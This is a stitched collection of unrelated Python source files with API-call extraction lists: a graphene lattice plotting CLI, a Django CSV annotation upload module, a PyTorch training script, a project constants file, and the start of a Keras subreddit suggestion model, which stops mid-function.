    gt.c_one_third_commensurate_command(args.m, args.n, args.strain, **geometry)
    fig, _ax = gt.c_one_third_commensurate_command_plot(args.m, args.n, args.strain, **geometry)
    if args.savefig:
        # Apply the requested matplotlib style only while writing the file.
        with gt.plt.style.context(args.mplstylefile):
            fig.savefig(args.savefig, dpi=args.dpi)
    fig.show()
    return 0
if __name__ == '__main__':
    # Run the CLI and propagate main()'s integer result as the process exit code.
    sys.exit(main(sys.argv))
| [
"graphenetools.gt.plt.style.context",
"graphenetools.gt.c_one_third_commensurate_command_plot",
"graphenetools.gt.c_one_third_commensurate_command",
"argparse.ArgumentParser"
] | [((115, 404), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Plot graphene lattice and C1/3 phase corresponding to printed command line arguments for uniaxially strained graphene (for use with QMC software located at https://code.delmaestro.org)"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description=\n 'Plot graphene lattice and C1/3 phase corresponding to printed command line arguments for uniaxially strained graphene (for use with QMC software located at https://code.delmaestro.org)'\n , formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n", (138, 404), False, 'import argparse\n'), ((2042, 2201), 'graphenetools.gt.c_one_third_commensurate_command', 'gt.c_one_third_commensurate_command', (['args.m', 'args.n', 'args.strain'], {'carbon_carbon_distance': 'args.carbon_carbon_distance', 'poisson_ratio': 'args.poisson_ratio'}), '(args.m, args.n, args.strain,\n carbon_carbon_distance=args.carbon_carbon_distance, poisson_ratio=args.\n poisson_ratio)\n', (2077, 2201), False, 'from graphenetools import gt\n'), ((2203, 2367), 'graphenetools.gt.c_one_third_commensurate_command_plot', 'gt.c_one_third_commensurate_command_plot', (['args.m', 'args.n', 'args.strain'], {'carbon_carbon_distance': 'args.carbon_carbon_distance', 'poisson_ratio': 'args.poisson_ratio'}), '(args.m, args.n, args.strain,\n carbon_carbon_distance=args.carbon_carbon_distance, poisson_ratio=args.\n poisson_ratio)\n', (2243, 2367), False, 'from graphenetools import gt\n'), ((2390, 2429), 'graphenetools.gt.plt.style.context', 'gt.plt.style.context', (['args.mplstylefile'], {}), '(args.mplstylefile)\n', (2410, 2429), False, 'from graphenetools import gt\n')] |
import psycopg2
import re
import json
from MedTAG_sket_dock_App.models import *
import os
import pandas as pd
import numpy
from psycopg2.extensions import register_adapter, AsIs
def addapt_numpy_float64(numpy_float64):
    """psycopg2 adapter: interpolate a numpy.float64 into SQL as-is (like a plain float)."""
    return AsIs(numpy_float64)
def addapt_numpy_int64(numpy_int64):
    """psycopg2 adapter: interpolate a numpy.int64 into SQL as-is (like a plain int)."""
    return AsIs(numpy_int64)
# Teach psycopg2 to serialize the numpy scalar types that leak out of pandas
# DataFrames when query parameters are built from CSV data.
register_adapter(numpy.float64, addapt_numpy_float64)
register_adapter(numpy.int64, addapt_numpy_int64)
from django.db.models import Count
from django.db import transaction
import datetime
from MedTAG_sket_dock_App.utils import *
def check_uploaded_files(files):
    """Validate CSV files uploaded by the user to copy ground-truths from.

    Each file must (1) have a name ending in 'csv', (2) parse with pandas,
    (3) contain exactly one of the four accepted column sets (labels /
    mentions / concepts / linking) and (4) hold at least one data row.

    :param files: list of uploaded file objects; each has a ``.name`` and is
        readable by :func:`pandas.read_csv`.
    :return: ``{'message': 'Ok'}`` when every file passes, otherwise
        ``{'message': 'ERROR - <filename> - <reason>'}`` for the first failure.
        NOTE(review): with an empty *files* list the message stays '' (original
        behavior, preserved) — confirm callers treat that as a failure.

    Improvements over the original: iterate the files directly instead of
    ``range(len(files))``, compare the column set against the four accepted
    sets in one membership test, and drop the lower-casing of the 'usecase'
    column (the lowered DataFrame was discarded, so the step had no effect).
    """
    # The four accepted header sets; an uploaded csv must match one exactly.
    accepted_column_sets = (
        {'username', 'annotation_mode', 'id_report', 'language', 'batch',
         'institute', 'usecase', 'label'},                                  # labels
        {'username', 'annotation_mode', 'id_report', 'language', 'batch',
         'institute', 'usecase', 'start', 'stop', 'mention_text'},          # mentions
        {'username', 'annotation_mode', 'id_report', 'language', 'batch',
         'institute', 'usecase', 'concept_url', 'concept_name', 'area'},    # concepts
        {'username', 'annotation_mode', 'id_report', 'language', 'batch',
         'institute', 'usecase', 'start', 'stop', 'mention_text',
         'concept_name', 'concept_url', 'area'},                            # linking
    )
    json_resp = {'message': ''}
    for uploaded in files:
        # Error if the file is not csv
        if not uploaded.name.endswith('csv'):
            json_resp['message'] = 'ERROR - ' + uploaded.name + ' - The file must be .csv'
            return json_resp
        try:
            df = pd.read_csv(uploaded)
            df = df.where(pd.notnull(df), None)
            df = df.reset_index(drop=True)  # Useful if the csv includes only commas
        except Exception as e:
            print(e)
            json_resp['message'] = 'ERROR - ' + uploaded.name + ' - An error occurred while parsing the csv. Check if it is well formatted. Check if it contains as many columns as they are declared in the header.'
            return json_resp
        # Duplicate columns are mangled by pandas ('x', 'x.1') and therefore
        # never match an accepted set, so they are rejected here too.
        if set(df.columns) not in accepted_column_sets:
            json_resp['message'] = 'ERROR - ' + uploaded.name + ' - The set of columns you inserted in the csv does not correspond to those we ask. Check the examples.'
            return json_resp
        # Check if the csv is empty with 0 rows
        if df.shape[0] == 0:
            json_resp['message'] = 'ERROR - ' + uploaded.name + ' - You must provide at least a row.'
            return json_resp
    if len(files) > 0:
        json_resp['message'] = 'Ok'
    return json_resp
def upload_files(files,user_to,overwrite):
"""This method handles the upload of csv files to copy th annotations from"""
json_resp = {'message':'Ok'}
mode_rob = NameSpace.objects.get(ns_id='Robot')
mode_hum = NameSpace.objects.get(ns_id='Human')
print(user_to)
username_rob = User.objects.get(username='Robot_user', ns_id=mode_rob)
try:
with transaction.atomic():
for i in range(len(files)):
df = pd.read_csv(files[i])
df = df.where(pd.notnull(df), None)
df = df.reset_index(drop=True) # Useful if the csv includes only commas
df.sort_values(['id_report','language','annotation_mode'])
cols = list(df.columns)
labels = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'label']
mentions = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'start', 'stop',
'mention_text']
concepts = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'concept_url',
'concept_name', 'area']
linking = ['username', 'annotation_mode', 'id_report', 'language','batch', 'institute', 'usecase', 'start', 'stop',
'mention_text', 'concept_name', 'concept_url', 'area']
for i, g in df.groupby(['id_report','language','annotation_mode']):
count_rows = g.shape[0]
deleted_mentions = False
if df.annotation_mode.unique()[0] == 'Manual':
a = 'Human'
else:
a = 'Robot'
report_cur = Report.objects.get(id_report = str(g.id_report.unique()[0]), language = g.language.unique()[0] )
mode = NameSpace.objects.get(ns_id =a)
anno_mode = mode
if a == 'Robot' and GroundTruthLogFile.objects.filter(username = username_rob).count() == 0:
json_resp = {'message':'automatic missing'}
return json_resp
report = report_cur
g = g.reset_index()
action = ''
user = User.objects.get(username=user_to, ns_id=mode)
if set(cols) == set(labels):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='labels')
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
Associate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language,
gt_type='labels').delete()
Associate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
elif set(cols) == set(mentions):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='mentions')
robot_gt = GroundTruthLogFile.objects.filter(username=username_rob, ns_id=mode_rob,
id_report=report, language=report.language,
gt_type='mentions')
# ins_time = ''
# if robot_gt.exists():
# rob_first_gt = robot_gt.first()
# ins_time = rob_first_gt.insertion_time
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
# user_to_gt_first = user_to_gt.first()
# if user_to_gt_first.insertion_time == ins_time:
# GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
# id_report=report,
# language=report.language,
# gt_type='mentions').delete()
if Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).exists():
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for e in links:
concept = e.concept_url
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, concept_url=concept).delete()
links.delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').delete()
if Linked.objects.filter(username=user, ns_id=mode,id_report=report,language=report.language).exists():
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for e in links:
concept = e.concept_url
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, concept_url=concept).delete()
links.delete()
elif set(cols) == set(concepts):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='concepts')
robot_gt = GroundTruthLogFile.objects.filter(username=username_rob, ns_id=mode_rob,
id_report=report, language=report.language,
gt_type='concepts')
# ins_time = ''
# if robot_gt.exists():
# rob_first_gt = robot_gt.first()
# ins_time = rob_first_gt.insertion_time
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
# user_to_gt_first = user_to_gt.first()
# if user_to_gt_first.insertion_time == ins_time:
# GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
# id_report=report,
# language=report.language,
# gt_type='concepts').delete()
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language,
gt_type='concepts').delete()
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
elif set(cols) == set(linking):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='concept-mention')
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for e in links:
concept = e.concept_url
area = e.name
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, name=area,
concept_url=concept).delete()
links.delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for ll in links:
concept = ll.concept_url
area = ll.name
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, concept_url=concept,name = area).delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
links.delete()
for i in range(count_rows):
usecase = str(df.loc[i, 'usecase'])
usecase_obj = UseCase.objects.get(name=usecase)
mode = str(g.loc[i, 'annotation_mode'])
id_report = str(g.loc[i, 'id_report'])
language = str(g.loc[i, 'language'])
institute = str(g.loc[i, 'institute'])
# user_from = str(g.loc[i, 'username'])
if mode == 'Manual':
mode = 'Human'
elif mode == 'Automatic':
mode = 'Robot'
# username_from = User.objects.get(username=user_from, ns_id=mode)
mode = NameSpace.objects.get(ns_id = mode)
report = Report.objects.get(id_report=id_report, language=language, institute=institute)
if set(cols) == set(labels):
label = AnnotationLabel.objects.get(label = str(g.loc[i, 'label']),name = usecase_obj)
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='labels').exists()) or overwrite == True:
if not Associate.objects.filter(username=user, ns_id=mode, id_report=report, label=label,seq_number=label.seq_number,
language=report.language).exists():
Associate.objects.create(username=user, ns_id=mode, id_report=report, label=label,
seq_number=label.seq_number,
language=report.language, insertion_time=Now())
action = 'labels'
elif set(cols) == set(mentions):
mention = Mention.objects.get(id_report = report, language = language, start = int(g.loc[i, 'start']),
stop = int(g.loc[i, 'stop']))
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').exists()) or overwrite == True:
if not Annotate.objects.filter(username=user, ns_id=mode, id_report=report,start = mention,stop = mention.stop,
language=report.language).exists():
Annotate.objects.create(username=user, ns_id=mode, id_report=report,start = mention,stop = mention.stop,
language=report.language, insertion_time=Now())
action = 'mentions'
elif set(cols) == set(concepts):
concept = Concept.objects.get(concept_url = str(g.loc[i, 'concept_url']))
area = SemanticArea.objects.get(name=str(g.loc[i, 'area']))
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').exists()) or overwrite == True:
if not Contains.objects.filter(username = user, ns_id =mode, id_report = report,concept_url = concept,name = area,
language = report.language).exists():
Contains.objects.create(username = user, ns_id =mode, id_report = report,concept_url = concept,name = area,
language = report.language,insertion_time = Now())
action = 'concepts'
elif set(cols) == set(linking):
concept = Concept.objects.get(concept_url = str(g.loc[i, 'concept_url']))
area = SemanticArea.objects.get(name=str(g.loc[i, 'area']))
mention = Mention.objects.get(id_report=report, language=language,start=int(g.loc[i, 'start']),
stop=int(g.loc[i, 'stop']))
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').exists()) or overwrite == True:
if not deleted_mentions:
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,language=report.language).delete()
deleted_mentions = True
a = Annotate.objects.filter(username = user, ns_id = mode, id_report = report,
language = report.language,start=mention,stop = mention.stop)
c = Contains.objects.filter(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language)
l = Linked.objects.filter(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language,start=mention,stop = mention.stop)
if not a.exists():
Annotate.objects.create(username=user, ns_id=mode, id_report=report,
language=report.language, start=mention, stop=mention.stop, insertion_time = Now())
if not c.exists():
Contains.objects.create(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language,insertion_time = Now())
if not l.exists():
Linked.objects.create(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language,start=mention,stop = mention.stop,insertion_time = Now())
action = 'concept-mention'
if action != '':
# gt_json = serialize_gt(action, usecase, user_to, report_cur.id_report, report_cur.language,
# anno_mode)
# GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type=action,gt_json=gt_json, insertion_time=Now(),id_report=report_cur, language=language)
if action == 'concept-mention':
gt_json = serialize_gt('mentions', usecase, user_to, report_cur.id_report, report_cur.language,
anno_mode)
GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type='mentions',
gt_json=gt_json, insertion_time=Now(),
id_report=report_cur, language=language)
gt_json = serialize_gt('concepts', usecase, user_to, report_cur.id_report, report_cur.language,
anno_mode)
GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type='concepts',
gt_json=gt_json, insertion_time=Now(),
id_report=report_cur, language=language)
if action == 'mentions':
gt_json = serialize_gt('concepts', usecase, user_to, report_cur.id_report, report_cur.language,
anno_mode)
if Contains.objects.filter(id_report=report_cur, language=language,username=user, ns_id=anno_mode).count()>0 and Linked.objects.filter(id_report=report_cur, language=language,username=user, ns_id=anno_mode).count()>0:
GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type='concepts',
gt_json=gt_json, insertion_time=Now(),
id_report=report_cur, language=language)
except Exception as e:
print(e)
json_resp = {'message':'an error occurred, remember that your configuration must be the same of the one of the user you are uploading the annotations of.'}
finally:
return json_resp
| [
"pandas.read_csv",
"psycopg2.extensions.AsIs",
"django.db.transaction.atomic",
"pandas.notnull",
"psycopg2.extensions.register_adapter"
] | [((316, 369), 'psycopg2.extensions.register_adapter', 'register_adapter', (['numpy.float64', 'addapt_numpy_float64'], {}), '(numpy.float64, addapt_numpy_float64)\n', (332, 369), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((370, 419), 'psycopg2.extensions.register_adapter', 'register_adapter', (['numpy.int64', 'addapt_numpy_int64'], {}), '(numpy.int64, addapt_numpy_int64)\n', (386, 419), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((230, 249), 'psycopg2.extensions.AsIs', 'AsIs', (['numpy_float64'], {}), '(numpy_float64)\n', (234, 249), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((298, 315), 'psycopg2.extensions.AsIs', 'AsIs', (['numpy_int64'], {}), '(numpy_int64)\n', (302, 315), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((1013, 1034), 'pandas.read_csv', 'pd.read_csv', (['files[i]'], {}), '(files[i])\n', (1024, 1034), True, 'import pandas as pd\n'), ((3583, 3603), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (3601, 3603), False, 'from django.db import transaction\n'), ((1061, 1075), 'pandas.notnull', 'pd.notnull', (['df'], {}), '(df)\n', (1071, 1075), True, 'import pandas as pd\n'), ((3666, 3687), 'pandas.read_csv', 'pd.read_csv', (['files[i]'], {}), '(files[i])\n', (3677, 3687), True, 'import pandas as pd\n'), ((3718, 3732), 'pandas.notnull', 'pd.notnull', (['df'], {}), '(df)\n', (3728, 3732), True, 'import pandas as pd\n')] |
import sys
# Make the project root importable when running this file directly.
sys.path.append("/home/ly/workspace/mmsa")
# Fix every RNG seed (Python-side numpy and torch, CPU and CUDA) so runs
# are reproducible.  Seeding must happen before any model construction.
seed = 1938
import numpy as np
import torch
from torch import nn
from torch import optim
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# Star imports presumably supply load_glove_data, get_loader, get_collate_fn,
# Model, get_Visdom, get_regal_optimizer, k_batch_train_visdom and `config`
# used by main() below -- TODO confirm which module provides `config`.
# NOTE(review): `from utils.train import *` is repeated three times.
from models.bigru_rcnn_gate import *
from utils.train import *
from typing import *
from utils.load_raw_yelp import *
from utils.dataset import *
from utils.train import *
from utils.train import *
def main():
    """
    Train the multimodal model on the Yelp GloVe data with Visdom monitoring.

    Builds the train/valid/test loaders, the model, the cross-entropy loss
    and an AdamW optimizer, then runs the k-batch training loop.  Relies on
    helpers star-imported at module level (``load_glove_data``,
    ``get_loader``, ``Model``, ``get_Visdom``, ``get_regal_optimizer``,
    ``k_batch_train_visdom``) and on the module-level ``config``.
    """
    train_set, valid_set, test_set = load_glove_data(config)
    batch_size = 2
    workers = 2
    train_loader, valid_loader, test_loader = get_loader(batch_size, workers, get_collate_fn(config),
                                                          train_set, valid_set, test_set)
    model = Model(config)
    loss = nn.CrossEntropyLoss()
    viz = get_Visdom()
    lr = 1e-3
    optimizer = get_regal_optimizer(model, optim.AdamW, lr)
    # NOTE(review): training runs on valid_loader rather than train_loader --
    # looks deliberate for a quick experiment, but confirm before real runs.
    k_batch_train_visdom(model, optimizer, loss, valid_loader, viz, 30, 10, use_cuda=False)
# Script entry point; explicit GPU selection is intentionally left disabled.
if __name__ == "__main__":
    # torch.cuda.set_device(1)
    main()
"torch.cuda.manual_seed_all",
"torch.manual_seed",
"torch.nn.CrossEntropyLoss",
"numpy.random.seed",
"torch.cuda.manual_seed",
"sys.path.append"
] | [((11, 53), 'sys.path.append', 'sys.path.append', (['"""/home/ly/workspace/mmsa"""'], {}), "('/home/ly/workspace/mmsa')\n", (26, 53), False, 'import sys\n'), ((144, 164), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (158, 164), True, 'import numpy as np\n'), ((165, 188), 'torch.manual_seed', 'torch.manual_seed', (['seed'], {}), '(seed)\n', (182, 188), False, 'import torch\n'), ((189, 217), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['seed'], {}), '(seed)\n', (211, 217), False, 'import torch\n'), ((218, 250), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['seed'], {}), '(seed)\n', (244, 250), False, 'import torch\n'), ((820, 841), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (839, 841), False, 'from torch import nn\n')] |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
########################################################################
# GNU General Public License v3.0
# GNU GPLv3
# Copyright (c) 2019, <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
########################################################################
"""
Constants for project.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import platform
import numpy as np
# Supported deep-learning frameworks; DL_FRAMEWORK holds the active choice
# (None until selected elsewhere).
DL_FRAMEWORKS = np.array(['caffe', 'tensorflow', 'pytorch', 'keras', 'caffe2'])
DL_FRAMEWORK = None
# Index of the GPU core used for computation.
GPU_CORE_ID = 0
# Feature-vector sizes of the CNN extraction points.
# NOTE(review): 7 sizes vs 11 feature types below -- confirm intended pairing.
CNN_FEATURE_SIZES = np.array([2048, 2048, 1000, 1024, 1000, 2048, 2048])
# Layer names features can be extracted from.
CNN_FEATURE_TYPES = np.array(['fc6', 'fc7', 'fc1000', 'fc1024', 'fc365', 'prob', 'pool5', 'fc8a', 'res3b7', 'res4b35', 'res5c'])
# Supported pre-trained CNN backbones.
CNN_MODEL_TYPES = np.array(['resnet152', 'googlenet1k', 'vgg16', 'places365-resnet152', 'places365-vgg', 'googlenet13k'])
# Image resize strategies applied before feature extraction.
RESIZE_TYPES = np.array(['resize', 'resize_crop', 'resize_crop_scaled', 'resize_keep_aspect_ratio_padded'])
# Whether a path is rooted at DATA_ROOT_PATH or PROJECT_ROOT_PATH.
ROOT_PATH_TYPES = np.array(['data', 'project'])
# Training schemes -- presumably 'ete' = end-to-end, 'tco' = train-classifier-only; confirm.
TRAIN_SCHEMES = np.array(['ete', 'tco'])
# Classification setting -- presumably 'ml' = multi-label, 'sl' = single-label; confirm.
MODEL_CLASSIFICATION_TYPES = np.array(['ml', 'sl'])
MODEL_MULTISCALE_TYPES = np.array(['dl', 'ks'])
# Supported optimizers.
SOLVER_NAMES = np.array(['adam', 'sgd'])
# Datasets the project can be run on.
DATASET_NAMES = np.array(['charades', 'kinetics400', 'breakfast_actions', 'you_cook_2', 'multi_thumos'])
# Root directories for data and project files (relative paths).
DATA_ROOT_PATH = './data'
PROJECT_ROOT_PATH = '../'
# Network hostname of the machine running the code.
MACHINE_NAME = platform.node()
| [
"numpy.array",
"platform.node"
] | [((1150, 1213), 'numpy.array', 'np.array', (["['caffe', 'tensorflow', 'pytorch', 'keras', 'caffe2']"], {}), "(['caffe', 'tensorflow', 'pytorch', 'keras', 'caffe2'])\n", (1158, 1213), True, 'import numpy as np\n'), ((1271, 1323), 'numpy.array', 'np.array', (['[2048, 2048, 1000, 1024, 1000, 2048, 2048]'], {}), '([2048, 2048, 1000, 1024, 1000, 2048, 2048])\n', (1279, 1323), True, 'import numpy as np\n'), ((1344, 1456), 'numpy.array', 'np.array', (["['fc6', 'fc7', 'fc1000', 'fc1024', 'fc365', 'prob', 'pool5', 'fc8a',\n 'res3b7', 'res4b35', 'res5c']"], {}), "(['fc6', 'fc7', 'fc1000', 'fc1024', 'fc365', 'prob', 'pool5',\n 'fc8a', 'res3b7', 'res4b35', 'res5c'])\n", (1352, 1456), True, 'import numpy as np\n'), ((1471, 1578), 'numpy.array', 'np.array', (["['resnet152', 'googlenet1k', 'vgg16', 'places365-resnet152',\n 'places365-vgg', 'googlenet13k']"], {}), "(['resnet152', 'googlenet1k', 'vgg16', 'places365-resnet152',\n 'places365-vgg', 'googlenet13k'])\n", (1479, 1578), True, 'import numpy as np\n'), ((1590, 1686), 'numpy.array', 'np.array', (["['resize', 'resize_crop', 'resize_crop_scaled',\n 'resize_keep_aspect_ratio_padded']"], {}), "(['resize', 'resize_crop', 'resize_crop_scaled',\n 'resize_keep_aspect_ratio_padded'])\n", (1598, 1686), True, 'import numpy as np\n'), ((1701, 1730), 'numpy.array', 'np.array', (["['data', 'project']"], {}), "(['data', 'project'])\n", (1709, 1730), True, 'import numpy as np\n'), ((1747, 1771), 'numpy.array', 'np.array', (["['ete', 'tco']"], {}), "(['ete', 'tco'])\n", (1755, 1771), True, 'import numpy as np\n'), ((1801, 1823), 'numpy.array', 'np.array', (["['ml', 'sl']"], {}), "(['ml', 'sl'])\n", (1809, 1823), True, 'import numpy as np\n'), ((1849, 1871), 'numpy.array', 'np.array', (["['dl', 'ks']"], {}), "(['dl', 'ks'])\n", (1857, 1871), True, 'import numpy as np\n'), ((1887, 1912), 'numpy.array', 'np.array', (["['adam', 'sgd']"], {}), "(['adam', 'sgd'])\n", (1895, 1912), True, 'import numpy as np\n'), ((1929, 2021), 'numpy.array', 
'np.array', (["['charades', 'kinetics400', 'breakfast_actions', 'you_cook_2', 'multi_thumos']"], {}), "(['charades', 'kinetics400', 'breakfast_actions', 'you_cook_2',\n 'multi_thumos'])\n", (1937, 2021), True, 'import numpy as np\n'), ((2085, 2100), 'platform.node', 'platform.node', ([], {}), '()\n', (2098, 2100), False, 'import platform\n')] |
import json
import numpy as np
import os
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization
from sklearn.model_selection import train_test_split
class SuggestionModeler(object):
    """
    Builds, trains, and serves a Keras model that suggests new subreddits to
    a user from the subreddit activity data retrieved in data_retrieval.py.
    """

    def __init__(self, force_retrain=False):
        """
        Load configuration and rank lookup tables, build the network for the
        configured method, and either train from scratch or restore
        previously saved weights.

        :param force_retrain: when True, retrain even if saved weights exist.
        """
        # Keep an explicit session/graph pair so predictions can later run
        # under graph.as_default()/session.as_default() (see
        # get_user_predictions).
        self.session = tf.Session()
        self.graph = tf.get_default_graph()

        with open("model_generation/config.json", "r") as infile:
            self.config = json.loads(infile.read())
        # BUG FIX: the existence check previously tested
        # "config_override.json" while the open() below used
        # "model_generation/config_override.json", so the guard and the read
        # could disagree.  Both now use the same path.
        if os.path.exists("model_generation/config_override.json"):
            with open("model_generation/config_override.json", "r") as infile:
                self.config.update(json.loads(infile.read()))

        # rank_to_subreddit maps 1-based popularity rank -> subreddit name;
        # subreddit_to_rank is its inverse.
        self.subreddit_to_rank = dict()
        with open(self.config["rank_to_subreddit_path"], 'r') as infile:
            self.rank_to_subreddit = json.loads(infile.read())
        self.rank_to_subreddit = {int(k): v for k, v in self.rank_to_subreddit.items()}
        for rank, subreddit in self.rank_to_subreddit.items():
            self.subreddit_to_rank[subreddit] = rank

        # rank -> flag marking the subreddit safe-for-work.
        with open(self.config['rank_to_sfw_status'], 'r') as infile:
            self.rank_to_sfw_status = json.loads(infile.read())
        self.rank_to_sfw_status = {int(k): v for k, v in self.rank_to_sfw_status.items()}

        self.method = self.config["method"]
        self.model_path = self.config['model_path'].format(method=self.method)

        if self.method == "hot":
            # Dense network over a multi-hot vector of the user's subreddits.
            model = Sequential()
            model.add(Dense(512, activation='relu',
                            input_shape=(self.config['max_subreddits_in_model'], )))
            model.add(Dropout(0.5))
            model.add(Dense(self.config['max_subreddits_in_model'], activation='sigmoid'))
            model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['acc'])
        else:
            raise ValueError("'method' in config not well defined")
        self.model = model

        # Train only when forced or when no saved weights exist yet.
        if force_retrain or not os.path.exists(self.model_path):
            model.summary()
            print("Preparing train/test data...")
            X, y = self.arrange_training_data(method=self.method)
            X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=self.config['test_pct'])
            train_data, test_data = (X_train, y_train), (X_test, y_test)
            print("Starting training process...")
            self.train_model(train_data, test_data)

        with self.graph.as_default():
            with self.session.as_default():
                self.model.load_weights(self.model_path)

    def arrange_training_data(self, method):
        """
        Convert the combined user->subreddit score file into (X, y) boolean
        training matrices.  Rows are users; column j corresponds to the
        subreddit of rank j+1, up to config['max_subreddits_in_model'].

        :param method: encoding strategy; only 'hot' (multi-hot) is supported.
        :return: (X, y) numpy bool arrays -- X marks subreddits the user
                 touched, y marks those with a positive score.
        :raises ValueError: for an unknown method.
        """
        import random
        with open(self.config["combined_user_to_subreddit_score_path"], 'r') as infile:
            user_subreddit_scores = json.loads(infile.read())
        # Sort each user's (rank, score) pairs by descending score.
        for k, scores in user_subreddit_scores.items():
            user_subreddit_scores[k] = sorted(scores, key=lambda x: x[1], reverse=True)
        data_length, data_width = len(user_subreddit_scores), self.config['max_subreddits_in_model']
        user_subreddit_scores = list(user_subreddit_scores.values())
        random.shuffle(user_subreddit_scores)

